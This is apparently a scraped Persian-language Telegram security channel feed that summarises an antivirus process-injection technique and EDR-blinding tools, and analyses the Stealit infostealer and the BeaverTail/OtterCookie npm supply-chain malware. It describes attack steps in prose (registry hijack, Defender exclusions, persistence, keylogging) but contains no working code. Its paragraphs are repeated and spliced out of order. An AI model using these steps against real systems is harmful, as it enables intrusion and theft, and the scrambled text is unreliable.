Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudsek
An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2 | CloudSEK
CloudSEK’s TRIAD team analyzed leaked internal documents from Iran-linked APT35 (Charming Kitten), revealing its structure, tools, and espionage operations. The group—tied to the IRGC—targeted government, legal, energy, and financial sectors across the Middle…
Please open Telegram to view this post
VIEW IN TELEGRAM
تحلیل جامع آسیبپذیری تزریق کد به فرآیندهای آنتیویروس
یک تکنیک پیشرفته و بسیار مهم که توسط یک پژوهشگر امنیت سایبری با نام مستعار "Two Seven One Three" کشف شده است. این تکنیک به مهاجمان اجازه میدهد تا با سوءاستفاده از مکانیزمهای حفاظتی خود نرمافزارهای آنتیویروس، کدهای مخرب را مستقیماً به فرآیندهای اصلی و محافظتشدهی این محصولات امنیتی تزریق کنند. این روش نه تنها به مهاجم امکان میدهد تا از دید سیستمهای امنیتی پنهان بماند، بلکه به او اجازه میدهد تا یک درب پشتی (Backdoor) پایدار در سیستمی ایجاد کند که قاعدتاً باید تحت محافظت شدید باشد.
در ادامه، جزئیات کامل این تکنیک، و اهمیت آن را بررسی میکنیم.
۱. مکانیزمهای دفاعی آنتیویروسها (چرا این حمله مهم است؟)
برای درک عمق این آسیبپذیری، ابتدا باید بدانیم آنتیویروسها چگونه از خودشان در برابر حملات محافظت میکنند:
سطح دسترسی SYSTEM: فرآیندهای آنتیویروس معمولاً با بالاترین سطح دسترسی در ویندوز (SYSTEM) اجرا میشوند تا بتوانند بر تمام فعالیتهای سیستم نظارت کرده و تهدیدات را خنثی کنند.
محافظت از فرآیند (Process Protection): آنتیویروسها از مکانیزمهایی مانند
Protected Process Light (PPL) در ویندوز استفاده میکنند. این ویژگی اجازه نمیدهد که حتی فرآیندهایی با دسترسی مدیر (Administrator) بتوانند فرآیندهای محافظتشده را دستکاری، متوقف یا به آنها کد تزریق کنند. به همین دلیل این فرآیندها "unkillable" یا غیرقابل توقف نامیده میشوند.بررسی یکپارچگی کد (Code Integrity Checks): آنتیویروسها بهطور مداوم بررسی میکنند که ماژولها و کتابخانههایی (DLL) که در فرآیندهایشان بارگذاری میشوند، دارای امضای دیجیتال معتبر باشند و دستکاری نشده باشند.
درایورهای سطح کرنل (Kernel-Level Drivers): درایورهای آنتیویروس در سطح هسته سیستمعامل (Kernel) فعالیت میکنند و هرگونه تلاش برای تغییر در مکانیزمهای شناسایی یا دستکاری فرآیندهای محافظتشده را مسدود میکنند.
حفاظت از فایلها و رجیستری: آنتیویروسها از دسترسی و نوشتن در پوشه نصب خود و کلیدهای رجیستری مربوط به خودشان بهشدت محافظت میکنند تا از غیرفعال شدن یا دستکاری آنها جلوگیری شود.
این حمله دقیقاً این لایههای دفاعی را هدف قرار میدهد و آنها را دور میزند.
۲. تشریح تکنیک حمله: شبیهسازی سرویس و تزریق کد
این تکنیک در دو مرحله اصلی انجام میشود:
مرحله اول: شبیهسازی سرویس محافظتشده (Service Cloning)
مهاجم بهجای حمله مستقیم به سرویس اصلی و در حال اجرای آنتیویروس (که تقریباً غیرممکن است)، یک کپی یا "کلون" از آن سرویس ایجاد میکند.
1. صادر کردن کلید رجیستری: مهاجم کلید رجیستری مربوط به یکی از سرویسهای محافظتشده آنتیویروس (مثلاً
BDProtSrv در Bitdefender) را پیدا کرده و آن را Export میکند. این کلید حاوی تمام تنظیمات و پیکربندیهای آن سرویس است.2. وارد کردن کلید با نام جدید: سپس مهاجم همان کلید رجیستری را با یک نام جدید Import میکند. با این کار، یک سرویس کاملاً جدید اما با همان مشخصات و سطح حفاظت سرویس اصلی در سیستم تعریف میشود.
3. بارگذاری سرویس کلونشده: پس از راهاندازی مجدد سیستم (Reboot)، سرویسمنیجر ویندوز (
Services.exe) این سرویس جدید را شناسایی کرده و آن را در حافظه پنهان خود بارگذاری میکند. حالا مهاجم یک سرویس کلونشده دارد که مانند سرویس اصلی، محافظتشده (PPL) است و با دسترسی SYSTEM اجرا میشود.مرحله دوم: تزریق کد از طریق ربودن ارائهدهنده رمزنگاری (Hijacking Cryptographic Provider)
از آنجایی که تزریق مستقیم کد به فرآیند محافظتشده کلونشده نیز مسدود است، مهاجم از یک مسیر هوشمندانه و غیرمستقیم استفاده میکند:
1۔ API رمزنگاری ویندوز: فرآیندهای آنتیویروس برای عملیات مختلفی مانند بررسی امضای دیجیتال و رمزنگاری، از توابع API رمزنگاری ویندوز (Windows Cryptography API) استفاده میکنند. این API برای یافتن ارائهدهندگان خدمات رمزنگاری (Providers) به یک مسیر مشخص در رجیستری مراجعه میکند.
2. تغییر مسیر در رجیستری: مهاجم کلید رجیستری زیر را دستکاری میکند:
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Providerاو مسیر پیشفرض را به مسیر فایل DLL مخرب خود تغییر میدهد.
3. بارگذاری DLL مخرب: هنگامی که سرویس کلونشده آنتیویروس اجرا میشود، برای انجام عملیات رمزنگاری، به مسیر دستکاریشده در رجیستری مراجعه میکند و ناآگاهانه، DLL مخرب مهاجم را به جای کتابخانه اصلی و معتبر ویندوز، در فضای حافظه خود بارگذاری (Load) میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
4. دور زدن بررسی امضای دیجیتال: برای اینکه آنتیویروس متوجه نشود که یک DLL غیرمعتبر بارگذاری شده است، مهاجم امضای دیجیتال یک برنامه معتبر ویندوز را کپی کرده و DLL مخرب خود را با آن امضا میکند. برای این کار از ابزارهایی مانند
با این روش، کد مخرب مهاجم اکنون در بستر یک فرآیند کاملاً محافظتشده و با بالاترین سطح دسترسی در حال اجرا است. این کد میتواند فایلهایی را در پوشه نصب آنتیویروس بنویسد (کاری که در حالت عادی غیرممکن است)، یک درب پشتی ایجاد کند، یا سایر بدافزارها را بدون شناسایی شدن اجرا کند.
۳. ابزار IAmAntimalware: اتوماسیون فرآیند حمله
پژوهشگر این تکنیک، برای اثبات عملی بودن آن و خودکارسازی مراحل، ابزاری متنباز به نام
* شبیهسازی سرویس مورد نظر.
* تغییر کلید رجیستری مربوط به ارائهدهنده رمزنگاری یا اشیاء COM.
* وارد کردن گواهی دیجیتال کلونشده برای دور زدن بررسی امضا.
* راهاندازی سرویس کلونشده و اجرای کد مخرب.
این ابزار روی محصولات امنیتی معروفی مانند Bitdefender ، Trend Micro و Avast با موفقیت آزمایش شده است.
. پیامدها و خطرات
اهمیت این تکنیک در این است که از نقاط قوت آنتیویروس علیه خودش استفاده میکند:
ایجاد درب پشتی پایدار: بدافزار میتواند خود را در محیط آنتیویروس جای دهد و با هر بار اجرای سیستم، همراه با آنتیویروس اجرا شود و شناسایی آن بسیار دشوار خواهد بود.
غیرفعالسازی پنهانی: کد تزریقشده میتواند بهتدریج و بهصورت پنهانی، قابلیتهای شناسایی آنتیویروس را غیرفعال کند.
اجرای دستورات با بالاترین سطح دسترسی: مهاجم میتواند از این طریق به کل سیستم با دسترسی SYSTEM مسلط شود.
CertClone استفاده میشود.با این روش، کد مخرب مهاجم اکنون در بستر یک فرآیند کاملاً محافظتشده و با بالاترین سطح دسترسی در حال اجرا است. این کد میتواند فایلهایی را در پوشه نصب آنتیویروس بنویسد (کاری که در حالت عادی غیرممکن است)، یک درب پشتی ایجاد کند، یا سایر بدافزارها را بدون شناسایی شدن اجرا کند.
۳. ابزار IAmAntimalware: اتوماسیون فرآیند حمله
پژوهشگر این تکنیک، برای اثبات عملی بودن آن و خودکارسازی مراحل، ابزاری متنباز به نام
IAmAntimalware را در گیتهاب منتشر کرده است. این ابزار با دریافت چند پارامتر خط فرمان، تمام مراحل زیر را بهصورت خودکار انجام میدهد:* شبیهسازی سرویس مورد نظر.
* تغییر کلید رجیستری مربوط به ارائهدهنده رمزنگاری یا اشیاء COM.
* وارد کردن گواهی دیجیتال کلونشده برای دور زدن بررسی امضا.
* راهاندازی سرویس کلونشده و اجرای کد مخرب.
این ابزار روی محصولات امنیتی معروفی مانند Bitdefender ، Trend Micro و Avast با موفقیت آزمایش شده است.
. پیامدها و خطرات
اهمیت این تکنیک در این است که از نقاط قوت آنتیویروس علیه خودش استفاده میکند:
ایجاد درب پشتی پایدار: بدافزار میتواند خود را در محیط آنتیویروس جای دهد و با هر بار اجرای سیستم، همراه با آنتیویروس اجرا شود و شناسایی آن بسیار دشوار خواهد بود.
غیرفعالسازی پنهانی: کد تزریقشده میتواند بهتدریج و بهصورت پنهانی، قابلیتهای شناسایی آنتیویروس را غیرفعال کند.
اجرای دستورات با بالاترین سطح دسترسی: مهاجم میتواند از این طریق به کل سیستم با دسترسی SYSTEM مسلط شود.
GitHub
GitHub - TwoSevenOneT/IAmAntimalware: This tool helps inject code into the processes of Antivirus programs.
This tool helps inject code into the processes of Antivirus programs. - TwoSevenOneT/IAmAntimalware
ابزار RealBlindingEDR غیرفعالسازی دائمی AV/EDR با استفاده از Kernel Callbackها
ابزاری متنباز که به مهاجمان این امکان را میدهد که با پاکسازی callbackهای حیاتی سطح کرنل در سیستمعامل ویندوز، نرمافزارهای آنتیویروس (AV) و تشخیص و پاسخ نقطه پایانی (EDR) را کور (blind)، بهطور دائم غیرفعال یا خاتمه دهند.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - myzxcg/RealBlindingEDR: Remove AV/EDR Kernel ObRegisterCallbacks、CmRegisterCallback、MiniFilter Callback、PsSetCreatePr…
تحلیل کمپین بدافزار جدید Stealit
و بهرهبرداری از قابلیت Node.js SEA برای پنهانسازی و گسترش
محققان FortiGuard به تازگی یک کمپین فعال و جدید از بدافزار سرقت اطلاعات Stealit را شناسایی کرده است که از یک تکنیک نوآورانه برای توزیع و اجرای payloadهای خود بهره میبرد. این کمپین با استفاده از قابلیت آزمایشی Single Executable Application (SEA) در Node.js، اسکریپتهای مخرب خود را به صورت یک فایل اجرایی مستقل بستهبندی میکند. این رویکرد به بدافزار اجازه میدهد تا بدون نیاز به پیشنصب بودن Node.js روی سیستم قربانی، اجرا شود و در نتیجه شناسایی آن را دشوارتر میسازد.
در ادامه، تحلیل فنی دقیقی از این کمپین، از مکانیزم توزیع تا اجزای اصلی و تکنیکهای فرار از تحلیل آن ارائه میشود.
زنجیره آلودگی و توزیع
بدافزار Stealit ، همانند نسخههای پیشین، خود را در قالب نصبکنندههای نرمافزارهای قانونی مانند بازیها و برنامههای VPN مخفی میکند. این فایلهای آلوده از طریق پلتفرمهای اشتراکگذاری فایل نظیر Mediafire و Discord توزیع میشوند. مهاجمان برای پیچیدهتر کردن فرآیند تحلیل، این نصبکنندهها را با ابزارهایی مانند PyInstaller بستهبندی کرده یا در آرشیوهای فشرده قرار میدهند.
جالب توجه است که وبسایت پنل کنترل و فرماندهی (C2) این بدافزار نیز به دامنههای جدیدی منتقل شده است. این وبسایت، Stealit را به عنوان یک "راهحل حرفهای استخراج داده" با طرحهای اشتراک مختلف برای سیستمعاملهای ویندوز و اندروید تبلیغ میکند و حتی یک کانال تلگرامی برای جذب مشتریان بالقوه دارد.
تحلیل فنی نصبکننده (Installer)
فرآیند نصب بدافزار چند لایه و بسیار پیچیده است و در تمام مراحل از obfuscation سنگین برای جلوگیری از تحلیل کد استفاده میشود.
#**لایه اول: بهرهبرداری از Node.js SEA**
فایل اجرایی اولیه یک بسته Node.js SEA است. این قابلیت آزمایشی، تمام اسکریپتها و وابستگیهای لازم را در یک فایل باینری واحد جمعآوری میکند. اسکریپت مخرب اصلی در بخشی از منابع فایل اجرایی به نام
NODE_SEA_BLOB ذخیره شده است. بررسی متادیتای این بخش نشان میدهد که این بسته با استفاده از یک پروژه متنباز به نام AngaBlue ساخته شده که فرآیند ایجاد فایلهای اجرایی SEA را خودکار میکند.#**لایههای دوم و سوم: اجرای درون حافظه**
اسکریپت لایه اول پس از اجرا، یک blob بزرگ و رمزنگاریشده را از داخل خود استخراج، رمزگشایی و با استفاده از تابع
require در Node.js مستقیماً در حافظه اجرا میکند. این اسکریپت لایه دوم نیز به نوبه خود، اسکریپت لایه سوم را که باز هم به شدت مبهمسازی شده، در حافظه اجرا میکند. این تکنیک زنجیرهای اجرای درون حافظه، تحلیل مبتنی بر فایل را بسیار دشوار میسازد.تکنیکهای ضد تحلیل (Anti-Analysis)
اسکریپت لایه سوم، پیش از نصب اجزای اصلی، مجموعهای گسترده از بررسیها را برای تشخیص محیطهای تحلیل و ماشینهای مجازی انجام میدهد. این بررسیها شامل موارد زیر است:
* تشخیص محیط مجازی: حداقل حافظه سیستم (2GB)، تعداد هستههای پردازنده (حداقل 2)، و بررسی نام کاربری و نام میزبان در برابر لیست سیاه کلمات کلیدی (مانند
vmware , sandbox , analyst , test ).* بررسی فایلها و مسیرهای مشکوک: جستجو برای فایلها و درایورهای مرتبط با VMware و VirtualBox.
* تحلیل زمانی (Timing Analysis): اندازهگیری زمان اجرای عملیات ریاضی برای تشخیص کندی ناشی از دیباگرها.
* شناسایی فرآیندهای پیشرفته: اجرای دستور
wmic برای لیست کردن تمام فرآیندها و جستجو برای نام ابزارهای تحلیل رایج (مانند wireshark , x64dbg , IDA , Ghidra , Process Monitor ) یا آرگومانهای مرتبط با دیباگ.* بررسی پورتهای شبکه: اجرای
netstat –an برای یافتن پورتهای فعال که در لیست سیاه قرار دارند.* تحلیل رجیستری: بررسی کلیدهای رجیستری مرتبط با دیباگرها.
* تشخیص تزریق DLL: بررسی DLLهای بارگذاریشده در فرآیند بدافزار برای یافتن موارد مرتبط با ابزارهای تحلیل.
* بررسی فرآیند والد (Parent Process): چک کردن فرآیند والد برای اطمینان از اینکه خود توسط یک ابزار تحلیل اجرا نشده باشد.
اگر هر یک از این بررسیها نشان دهد که بدافزار در حال تحلیل است، با نمایش یک پیام خطا، اجرای خود را متوقف میکند.
نصب و ماندگاری اجزای اصلی
پس از عبور موفقیتآمیز از بررسیهای ضد تحلیل، نصبکننده سه کامپوننت اصلی را از سرور C2 دانلود میکند:
save_data.exe , stats_db.exe و game_cache.exe .این فایلها در یک مسیر تصادفی در
AppData\Local ذخیره میشوند و برای جلوگیری از اسکن توسط Windows Defender، مسیر دایرکتوری ایجاد شده با استفاده از یک دستور PowerShell به لیست استثنائات (Exclusion list) آن اضافه میشود.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
برای ماندگاری ، بدافزار یک اسکریپت Visual Basic به نام
تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
startup.vbs در پوشه Startup ویندوز ایجاد میکند که وظیفه اجرای کامپوننت game_cache.exe را در هر بار راهاندازی سیستم بر عهده دارد.تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
cache.exe را که بر پایه پروژه متنباز ChromElevator توسعه یافته، از خود استخراج و اجرا میکند. این ابزار قادر است مکانیزمهای امنیتی مرورگرها را دور بزند.2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
دانشگاه MIT یک هوش مصنوعی ساخته که میتونه کد خودش رو بازنویسی کنه تا باهوشتر بشه.
بهش میگن SEAL (مدلهای زبانی خود-تطبیقپذیر) .
به جای اینکه انسانها تنظیمش کنن، SEAL اطلاعات جدید رو خونده، اونا رو با کلمات خودش بازنویسی میکنه و بهروزرسانیهای گرادیان رو روی خودش اجرا میکنه و به معنای واقعی کلمه یادگیری خودراهبر داره.
و ما تازه وارد عصر مدلهای خود-تکاملی شدیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
پژوهشگران دو دانشگاه مطرح آمریکا بمدت سه سال یک آنتن نه چندان پیچیده رو به سمت آسمان گرفتند و به داده هاییکه بین ایستگاهای زمینی و ماهواره ها مبادله میشد گوش دادند. نتیجه تحقیق تکاندهنده هست!
اونها موفق به ضبط هزاران گفتوگوی صوتی و پیام کوتاه رمزنگاری نشده رو از کاربران یک شبکهٔ تلفن همراه شدند. همچنین ارتباطات برخی از نهادهای نظامی و اطلاعاتی در بین داده های ثبت شده وجود داشت که از اهمیت بالایی برخوردارند. این پژوهش نشون میده که نزدیک به نیمی از پیامهای ماهوارهای در مدار ثابت زمین بدون هیچ گونه رمزنگاری مبادله میشوند. یعنی سیلی از دادههای بسیار حساس از فراز زمین عبور میکنند و هر کس با یک ابزار ساده و هزینه ای کمتر از ۸۰۰ دلار قادر به دریافت انهاست.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - KittenBusters/CharmingKitten: Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500)
Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500) - KittenBusters/CharmingKitten
تحلیلی عمیق بر یک روتکیت پیشرفته و پنهانکار هسته لینوکس
Singularity - Powerful Linux Kernel Rootkit
Please open Telegram to view this post
VIEW IN TELEGRAM
blog.kyntra.io
Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit – Kyntra Blog
Deep dive into a modern stealth Linux kernel rootkit with advanced evasion and persistence techniques
Please open Telegram to view this post
VIEW IN TELEGRAM
Trend Micro
Operation Zero Disco: Attackers Exploit Cisco SNMP Vulnerability to Deploy Rootkits
Trend™ Research has uncovered an attack campaign exploiting the Cisco SNMP vulnerability CVE-2025-20352, allowing remote code execution and rootkit deployment on unprotected devices, with impacts observed on Cisco 9400, 9300, and legacy 3750G series.
تحلیل یک حمله:
ترکیب BeaverTail و OtterCookie با ماژول جدید Keylogging
گروه (APT) Famous Chollima ، که زیرمجموعهای از گروه بزرگتر Lazarus و همسو با منافع اقتصادی کره شمالی (DPRK) است، بار دیگر با تکامل ابزارهای خود، جامعه توسعهدهندگان و جویندگان کار در حوزه فناوری را هدف قرار داده است. در جدیدترین کمپین کشفشده ، این گروه با ترکیب دو بدافزار مجزای پیشین، BeaverTail و OtterCookie ، و افزودن یک ماژول جدید مبتنی بر جاوا اسکریپت برای Keylogging و (Screenshotting) ، یک ابزار سرقت اطلاعات یکپارچه و قدرتمند ایجاد کرده است.
بررسی اجمالی کمپین و تاکتیکها
- هدف: سرقت اطلاعات حساس، به ویژه ارزهای دیجیتال و اطلاعات اعتباری (credentials).
- قربانیان: عمدتاً جویندگان کار و توسعهدهندگان نرمافزار.
- روش مهندسی اجتماعی: مهاجمان با جعل هویت سازمانهای استخدامی و ارائه پیشنهادات شغلی جعلی، قربانیان را فریب میدهند تا یک اپلیکیشن آلوده را به عنوان بخشی از فرآیند مصاحبه یا آزمون فنی نصب کنند.
- نمونه موردی: در این حمله، یک سازمان در سریلانکا به صورت غیرمستقیم مورد هدف قرار گرفت. یکی از کارمندان این سازمان، فریب یک پیشنهاد شغلی جعلی را خورده و یک اپلیکیشن تروجانایز شده مبتنی بر Node.js به نام "Chessfi" را نصب کرده است. این اپلیکیشن که ظاهراً یک پلتفرم شطرنج مبتنی بر وب ۳ برای شرطبندی با ارز دیجیتال است، به عنوان طعمهای ایدهآل برای جذب اهداف علاقهمند به این حوزه عمل میکند.
زنجیره آلودگی: یک فرآیند چندمرحلهای و پنهانکارانه
مهاجمان برای پنهان کردن فعالیت مخرب خود از یک زنجیره آلودگی پیچیده استفاده میکنند که تشخیص آن برای یک توسعهدهنده معمولی دشوار است:
1. کلون کردن پروژه: قربانی از طریق پلتفرمهایی مانند Fiverr یا Discord ترغیب میشود تا یک پروژه نرمافزاری را از یک مخزن Git (در این مورد، Bitbucket) کلون کند.
2. نصب وابستگیها: طبق دستورالعملهای موجود در فایل
README.md ، قربانی دستور npm install را برای نصب پکیجهای مورد نیاز پروژه اجرا میکند.3. اجرای پکیج مخرب: در میان وابستگیها، یک پکیج مخرب به نام node-nvm-ssh که در مخزن رسمی NPM منتشر شده، دانلود و نصب میشود.
4. اسکریپت postinstall: فایل
package.json این پکیج مخرب حاوی یک اسکریپت postinstall است. این اسکریپت به گونهای طراحی شده که پس از اتمام نصب به طور خودکار اجرا شود. این اسکریپت، دستورات دیگری را فراخوانی میکند که در نهایت به اجرای یک فایل جاوا اسکریپت منجر میشود.5. ایجاد فرآیند فرزند (Child Process): یک اسکریپت میانی (
index.js) یک فرآیند فرزند جدا شده (detached child process) را ایجاد میکند تا اسکریپت مخرب بعدی (file15.js) را اجرا کند. این کار به بدافزار اجازه میدهد حتی پس از بسته شدن ترمینال اصلی، به اجرای خود ادامه دهد.6. بارگذاری پیلود نهایی: اسکریپت
file15.js محتویات یک فایل به نام test.list را میخواند و با استفاده از تابع eval() آن را اجرا میکند. این فایل حاوی پیلود نهایی است؛ یک کد جاوا اسکریپت بسیار بزرگ و مبهمسازی شده (Obfuscated) که ترکیبی از BeaverTail و OtterCookie است.تکامل بدافزار: ادغام BeaverTail و OtterCookie
تا پیش از این، BeaverTail و OtterCookie به عنوان دو ابزار مجزا اما مکمل عمل میکردند. اما در این کمپین، کارکردهای آنها در یک پیلود واحد ادغام شده است.
#**قابلیتهای به ارث برده از BeaverTail:
- **شمارش پروفایلها و افزونههای مرورگر: جستجو برای پروفایلهای مرورگرهای مختلف و افزونههای نصبشده، به ویژه افزونههای مرتبط با کیف پولهای ارز دیجیتال.
- دانلود پیلود ثانویه: قابلیت دانلود و اجرای ماژولهای پایتونی مانند InvisibleFerret (یک ابزار سرقت اطلاعات) از سرور فرماندهی و کنترل (C2).
- نصب ابزار دسترسی از راه دور: در نسخههای قدیمیتر، ابزارهایی مانند AnyDesk را برای کنترل کامل سیستم قربانی نصب میکرد.
#**قابلیتهای OtterCookie و ماژول جدید آن (نسخه v5):
۔ OtterCookie از یک ابزار ساده برای بارگذاری کد از راه دور به یک بدافزار ماژولار و پیشرفته تبدیل شده است.
- **ماژول Remote Shell: با استفاده از پکیج
socket.io-client یک ارتباط پایدار با سرور C2 برقرار کرده و به مهاجم اجازه میدهد دستورات را از راه دور روی سیستم قربانی اجرا کند.- ماژول سرقت فایل: فایل سیستم را برای یافتن فایلهای "جذاب" با الگوها و پسوندهای مشخص (مانند env , .metamask , .wallet , .pdf , .docx , .secret. , ... ) جستجو کرده و آنها را به سرور C2 آپلود میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
- ماژول سرقت محتوای کلیپبورد: به طور دورهای محتوای کلیپبورد را بررسی کرده و به سرور C2 ارسال میکند.
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
- کلیدهای ثبتشده در فایلی به نام
- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
node-global-key-listener برای ثبت تمام کلیدهای فشردهشده کیبورد و screenshot-desktop برای گرفتن عکس از صفحه دسکتاپ استفاده میکند.- کلیدهای ثبتشده در فایلی به نام
1.tmp و اسکرینشاتها در فایلی به نام 2.jpeg در یک پوشه موقت (windows-cache) ذخیره میشوند.- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
